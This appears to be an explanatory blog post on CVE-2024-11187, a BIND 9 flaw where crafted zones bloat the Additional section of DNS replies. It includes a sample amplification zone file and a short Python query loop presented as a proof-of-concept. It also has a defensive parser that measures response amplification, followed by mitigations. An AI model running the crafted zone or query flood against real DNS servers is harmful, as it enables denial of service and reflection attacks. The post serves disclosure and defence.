CVE-2024-11187 - How Crafted DNS Zones Can Overload BIND 9 Servers (Vulnerability Explained)
CVE-2024-11187 is a security vulnerability discovered in multiple versions of the BIND 9 DNS server software, which is widely deployed across the internet for domain name resolution. This issue allows an attacker to deliberately craft DNS zones that trigger BIND to return many records in the Additional section of DNS replies. Sending a flood of such requests can cause authoritative servers or resolvers to consume excessive memory and CPU, leading to degraded performance or even denial of service (DoS).
This vulnerability does not exploit traditional code bugs like buffer overflows, but instead abuses how BIND processes and responds to certain types of DNS queries. The problem is particularly severe when attackers can create zone files (or trick others into using maliciously crafted zones), causing the server's resources to be tied up serving unnecessarily bloated DNS responses.
Affected versions include BIND 9.18.11-S1 through 9.18.32-S1.
All users running affected versions should update as soon as patches are available, or implement the mitigations suggested by the vendor in the meantime.
The Vulnerability – In Simple Terms
When a DNS query is made, BIND may add extra information in the Additional section of a response—for example, IP addresses that go with referenced hostnames. That’s normal and can save time for DNS clients.
This vulnerability arises when the zone itself is crafted to reference a large number of other names in a way that causes BIND to include dozens, hundreds, or even more records in the Additional section for a single query.
Sending repeated queries for records within such a zone can cause BIND to work much harder than usual for each request. This can slow down the server, exhaust memory, or even crash it under heavy load.
Here’s a stripped-down example BIND zone file (not a real attack) showing the general trick:

```zone
$ORIGIN evilzone.example.
@ IN SOA ns.evilzone.example. admin.evilzone.example. ( 1 720 360 120960 360 )
  IN NS ns.evilzone.example.
ns IN A 192.0.2.1
; Below, the MX record points to a "mail" host, but the "mail" host has a large number of A and AAAA records
test IN MX 10 mail.evilzone.example.
mail IN A 192.0.2.10
mail IN A 192.0.2.11
mail IN A 192.0.2.12
mail IN A 192.0.2.13
; ...repeat for hundreds of addresses
mail IN AAAA 2001:db8::1
mail IN AAAA 2001:db8::2
; ...repeat for hundreds of IPv6 addresses
```
If a resolver queries for the MX record of test.evilzone.example, BIND will add all A and AAAA records for mail.evilzone.example into the Additional section, causing a huge response.
Note: A real attack would use many more records (hundreds or thousands) for maximum amplification.
Proof-of-Concept Exploit (Python)
Let’s see a simplified Python script (using the dnspython library) that triggers this issue against a vulnerable BIND server. (For educational use only! Block evilzone.example in your resolver.)

```python
import dns.resolver  # pip install dnspython

for i in range(100):
    try:
        # Query the MX record for test.evilzone.example to trigger a large Additional section
        answers = dns.resolver.resolve('test.evilzone.example', 'MX')
        print(f"Response #{i}: Received {len(answers.response.additional)} additional records")
    except Exception as e:
        print(f"Query failed: {e}")
```
Flooding the server with these requests can consume excessive CPU, memory, and network bandwidth.
Why Is This a Threat?
- Resource Exhaustion: Authoritative servers or open resolvers may run out of memory processing large responses and tracking state.
- Amplification: Attack traffic is much smaller than the server’s responses, so a relatively small request causes a big, expensive reply.
- Denial of Service: High load could either slow down or crash the affected server, disrupting DNS for legitimate users.
- Potential for Reflection Attacks: If the attacker spoofs the source address of the queries, the oversized responses are sent to the spoofed victim, so this could become part of a larger reflected DoS attack.
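To make the "bloated Additional section" and the amplification ratio described above concrete, here is an added example (not code from the original post, and not ISC's code) that builds a DNS query and a matching response in wire format using only the Python standard library, then parses the response, tallies records and bytes per section, and flags responses whose Additional section exceeds a threshold. The names `test.evilzone.example` and `mail.evilzone.example` come from the zone example in the post; the record count, the 192.0.2.0/24 addresses, the threshold of 20 and all function names are constructed for illustration. The parser walks every record, so it also serves as a small audit tool a defender could point at captured responses.

```python
"""DNS wire-format builder/parser for measuring Additional-section bloat.

Added example, not from the original post. All sample data is constructed.
"""
import struct

TYPE_A, TYPE_MX = 1, 15
CLASS_IN = 1
QNAME = "test.evilzone.example."   # names taken from the post's zone example
MAIL = "mail.evilzone.example."


def encode_name(name: str) -> bytes:
    """Encode a dotted name as DNS labels (no compression)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(msg: bytes, offset: int):
    """Decode a name at offset, following compression pointers.
    Returns (name, offset just past the name in the current record)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                      # compression pointer
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels) + ".", (end if end is not None else offset)


def build_query(qname: str, qtype: int, txid: int = 0x1234) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set
    return header + encode_name(qname) + struct.pack("!HH", qtype, CLASS_IN)


def rr(name: str, rtype: int, rdata: bytes, ttl: int = 300) -> bytes:
    """Serialise one resource record."""
    return encode_name(name) + struct.pack("!HHIH", rtype, CLASS_IN, ttl, len(rdata)) + rdata


def build_response(qname, qtype, answers, additionals, txid=0x1234) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, len(answers), 0, len(additionals))  # QR+AA
    question = encode_name(qname) + struct.pack("!HH", qtype, CLASS_IN)
    return header + question + b"".join(answers) + b"".join(additionals)


def section_stats(msg: bytes) -> dict:
    """Walk every record and return record and byte counts per section."""
    _txid, _flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    for _ in range(qd):                                # skip the question section
        _, offset = decode_name(msg, offset)
        offset += 4
    stats = {}
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        start = offset
        for _ in range(count):
            _, offset = decode_name(msg, offset)
            _rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
            offset += 10 + rdlen
        stats[section] = {"records": count, "bytes": offset - start}
    if offset != len(msg):
        raise ValueError("trailing bytes after last section")
    return stats


def build_bloated_example(n_addresses: int = 200):
    """Constructed MX query plus a response whose Additional section carries
    n_addresses A records for the mail host, mimicking the post's zone."""
    query = build_query(QNAME, TYPE_MX)
    mx_rdata = struct.pack("!H", 10) + encode_name(MAIL)            # preference 10
    answers = [rr(QNAME, TYPE_MX, mx_rdata)]
    additionals = [rr(MAIL, TYPE_A, struct.pack("!4B", 192, 0, 2, i))
                   for i in range(1, n_addresses + 1)]
    return query, build_response(QNAME, TYPE_MX, answers, additionals)


def audit(query: bytes, response: bytes, max_additional: int = 20) -> dict:
    """Per-section stats plus amplification ratio and an oversized flag.
    The threshold of 20 is a constructed example value."""
    stats = section_stats(response)
    stats["amplification"] = round(len(response) / len(query), 1)
    stats["oversized_additional"] = stats["additional"]["records"] > max_additional
    return stats


if __name__ == "__main__":
    q, r = build_bloated_example()
    print(audit(q, r))
```

With 200 addresses the 39-byte query yields a 7497-byte response, an amplification factor of roughly 192, almost all of it in the Additional section; the same query against a host with a single address produces a 134-byte response and is not flagged. The `max_additional` threshold is where a monitoring hook would sit in practice.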
Mitigation Steps
- Patch: Upgrade BIND as soon as vendor fixes are available (see ISC BIND Security Advisories).
- Limit Additional Section Size: Use BIND options or firewall rules to restrict the size of DNS responses.
References
- Official CVE Record (NVD)
- ISC Security Advisory: CVE-2024-11187
- BIND 9 Release Notes
- BIND Administrator Reference Manual
Summary
CVE-2024-11187 gives attackers a new way to cause trouble not by hacking your code, but by fooling BIND 9 into doing much more work than necessary. It’s a reminder to keep DNS servers up-to-date and to be careful about what zones you trust and serve.
Stay vigilant—patch BIND, watch your DNS logs, and restrict unknown or untrusted zones!
Timeline
Published on: 01/29/2025 22:15:28 UTC